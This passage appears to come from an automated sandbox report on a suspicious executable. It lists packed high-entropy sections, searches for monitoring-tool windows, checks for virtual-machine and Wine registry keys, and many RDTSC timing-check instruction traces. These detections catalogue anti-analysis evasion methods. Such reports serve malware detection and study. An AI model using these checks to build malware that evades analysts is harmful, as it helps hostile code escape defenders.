          Source: C:\Users\user\Desktop\file.exe Code function: 0_3_05585183 push ds; retf 0_3_055851C9
          Source: file.exe Static PE information: section name: entropy: 7.977505472489843
          Source: file.exe Static PE information: section name: prornizb entropy: 7.953536728834796

          Boot Survival

          Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass
          Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS
          Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass
          Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass
          Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass
          Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\file.exe System information queried: FirmwareTableInformation
          Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine
          Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37D9A second address: B37DA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F17414E33F6h 0x0000000a pop edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37DA5 second address: B37DC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F174075FE87h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37DC3 second address: B37DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B37DCC second address: B37DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BD70 second address: B3BD8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3405h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BD8F second address: B3BD93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BE04 second address: B3BE08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BE08 second address: B3BE58 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push eax 0x0000000b call 00007F174075FE78h 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc eax 0x0000001e push eax 0x0000001f ret 0x00000020 pop eax 0x00000021 ret 0x00000022 cmc 0x00000023 push 00000000h 0x00000025 call 00007F174075FE81h 0x0000002a mov dx, di 0x0000002d pop esi 0x0000002e push C2E82C10h 0x00000033 push eax 0x00000034 push edx 0x00000035 js 00007F174075FE7Ch 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BE58 second address: B3BE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BE5C second address: B3BEC8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jl 00007F174075FE76h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c add dword ptr [esp], 3D17D470h 0x00000013 sbb cl, FFFFFFC7h 0x00000016 push 00000003h 0x00000018 call 00007F174075FE88h 0x0000001d mov edx, dword ptr [ebp+122D37CEh] 0x00000023 pop edi 0x00000024 push 00000000h 0x00000026 mov edx, ecx 0x00000028 push 00000003h 0x0000002a sub dword ptr [ebp+122D3449h], edx 0x00000030 call 00007F174075FE79h 0x00000035 jmp 00007F174075FE85h 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f jno 00007F174075FE76h 0x00000045 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BEC8 second address: B3BEE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BEE5 second address: B3BEEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F174075FE76h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BFFA second address: B3BFFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B3BFFE second address: B3C049 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 00D7E830h 0x0000000e mov ecx, dword ptr [ebp+122D34C6h] 0x00000014 push 00000003h 0x00000016 or cl, 00000017h 0x00000019 push 00000000h 0x0000001b mov edi, 387DA5BCh 0x00000020 push 00000003h 0x00000022 mov cx, C4A7h 0x00000026 push AA6DBDD8h 0x0000002b jc 00007F174075FE96h 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F174075FE88h 0x00000038 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C22F second address: B5C235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C235 second address: B5C239 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C239 second address: B5C274 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F17414E33F6h 0x00000008 jmp 00007F17414E33FCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007F17414E33F8h 0x00000015 pushad 0x00000016 popad 0x00000017 jne 00007F17414E33FAh 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jg 00007F17414E33F6h 0x00000029 jl 00007F17414E33F6h 0x0000002f popad 0x00000030 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5C274 second address: B5C279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B27DB1 second address: B27DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E33FBh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A5E4 second address: B5A5FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jno 00007F174075FE76h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A5FD second address: B5A603 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A73C second address: B5A740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5A89C second address: B5A8A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AB64 second address: B5AB68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AB68 second address: B5AB6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AB6C second address: B5AB72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5ACE7 second address: B5ACFC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F17414E33F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F17414E33FBh 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5ACFC second address: B5AD2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE84h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F174075FE87h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AD2D second address: B5AD31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AEAA second address: B5AEAF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5AEAF second address: B5AEB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5B2F5 second address: B5B2FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BA4D second address: B5BA52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BA52 second address: B5BA95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE85h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F174075FE85h 0x0000000e jmp 00007F174075FE85h 0x00000013 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5BA95 second address: B5BAB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3409h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B4F16D second address: B4F175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E23F second address: B5E243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E243 second address: B5E247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5E842 second address: B5E849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B5D068 second address: B5D06D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29823 second address: B29827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B29827 second address: B2984F instructions: 0x00000000 rdtsc 0x00000002 jg 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F174075FE83h 0x0000000f jns 00007F174075FE78h 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66B40 second address: B66B44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B2B34D second address: B2B351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65F38 second address: B65F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F17414E33F6h 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B65F42 second address: B65F46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6621C second address: B66220 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B66220 second address: B66237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F174075FE7Fh 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B663B3 second address: B663BC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6699A second address: B6699E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6699E second address: B669A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B669A2 second address: B669AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B669AA second address: B669B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B669B0 second address: B669EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F174075FE88h 0x0000000c pop edx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 je 00007F174075FE76h 0x00000018 push eax 0x00000019 pop eax 0x0000001a pop eax 0x0000001b jmp 00007F174075FE80h 0x00000020 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67F17 second address: B67F7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3409h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push esi 0x0000000e jne 00007F17414E33FCh 0x00000014 pop esi 0x00000015 mov eax, dword ptr [eax] 0x00000017 jnp 00007F17414E340Dh 0x0000001d jmp 00007F17414E3407h 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F17414E3402h 0x0000002d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67F7D second address: B67F82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B67F82 second address: B67FDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F17414E33FAh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F17414E33F8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Ah 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov esi, dword ptr [ebp+122D35E2h] 0x0000002d push 1A44D22Eh 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F17414E3409h 0x00000039 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B682F7 second address: B682FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68C0C second address: B68C10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68C10 second address: B68C16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B68CB7 second address: B68CBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6A0AB second address: B6A10E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 push eax 0x00000007 jnc 00007F174075FE88h 0x0000000d nop 0x0000000e pushad 0x0000000f or bx, 4F67h 0x00000014 mov edx, dword ptr [ebp+122D366Ah] 0x0000001a popad 0x0000001b push 00000000h 0x0000001d or dword ptr [ebp+122D3449h], ecx 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 mov dword ptr [ebp+122D17DEh], ecx 0x0000002c pop esi 0x0000002d xchg eax, ebx 0x0000002e jmp 00007F174075FE89h 0x00000033 push eax 0x00000034 push edi 0x00000035 push eax 0x00000036 push edx 0x00000037 jbe 00007F174075FE76h 0x0000003d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BD02 second address: B6BD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6BAE9 second address: B6BAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71586 second address: B71592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C47B second address: B6C496 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 je 00007F174075FE76h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jnp 00007F174075FE76h 0x0000001b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71592 second address: B71597 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B6C496 second address: B6C4A0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F174075FE76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B1A second address: B71B1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B1E second address: B71B4C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F174075FE8Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007F174075FE80h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B4C second address: B71B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 sub dword ptr [ebp+122D33CFh], edx 0x0000000c mov bx, 4F86h 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D33F0h], eax 0x00000018 push 00000000h 0x0000001a adc di, B989h 0x0000001f push eax 0x00000020 pushad 0x00000021 pushad 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71B72 second address: B71B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F174075FE80h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B72BD3 second address: B72BEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17414E3404h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B73C8F second address: B73C9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F174075FE76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B71D79 second address: B71D7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B74C5F second address: B74CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jc 00007F174075FE76h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jg 00007F174075FE76h 0x00000019 ja 00007F174075FE76h 0x0000001f popad 0x00000020 popad 0x00000021 nop 0x00000022 call 00007F174075FE81h 0x00000027 jbe 00007F174075FE78h 0x0000002d push ebx 0x0000002e pop edi 0x0000002f pop ebx 0x00000030 mov ebx, 0F5B2122h 0x00000035 push 00000000h 0x00000037 xor dword ptr [ebp+122D30ABh], eax 0x0000003d push 00000000h 0x0000003f mov ebx, dword ptr [ebp+122D1EFAh] 0x00000045 xchg eax, esi 0x00000046 jmp 00007F174075FE88h 0x0000004b push eax 0x0000004c push edi 0x0000004d push ebx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B72D40 second address: B72D5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17414E3407h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B71D7F second address: B71D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F174075FE7Bh 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B73EE9 second address: B73EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B71D8E second address: B71D92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B74E42 second address: B74E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B31EB6 second address: B31EC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B31EC1 second address: B31ED0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F17414E33F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B31ED0 second address: B31EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F174075FE86h 0x00000009 jo 00007F174075FE76h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B782C4 second address: B7836A instructions: 0x00000000 rdtsc 0x00000002 je 00007F17414E33F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F17414E33F8h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 jl 00007F17414E33F8h 0x00000019 pushad 0x0000001a popad 0x0000001b pop eax 0x0000001c nop 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F17414E33F8h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000017h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 push 00000000h 0x00000039 jmp 00007F17414E3400h 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebp 0x00000043 call 00007F17414E33F8h 0x00000048 pop ebp 0x00000049 mov dword ptr [esp+04h], ebp 0x0000004d add dword ptr [esp+04h], 0000001Bh 0x00000055 inc ebp 0x00000056 push ebp 0x00000057 ret 0x00000058 pop ebp 0x00000059 ret 0x0000005a mov ebx, dword ptr [ebp+122D3602h] 0x00000060 call 00007F17414E3409h 0x00000065 add ebx, dword ptr [ebp+122D30BFh] 0x0000006b pop edi 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f js 00007F17414E33F8h 0x00000075 pushad 0x00000076 popad 0x00000077 rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7A29E second address: B7A2BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F174075FE84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
          Source: C:\Users\user\Desktop\file.exe  RDTSC instruction interceptor: First address: B7947E second address: B79483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
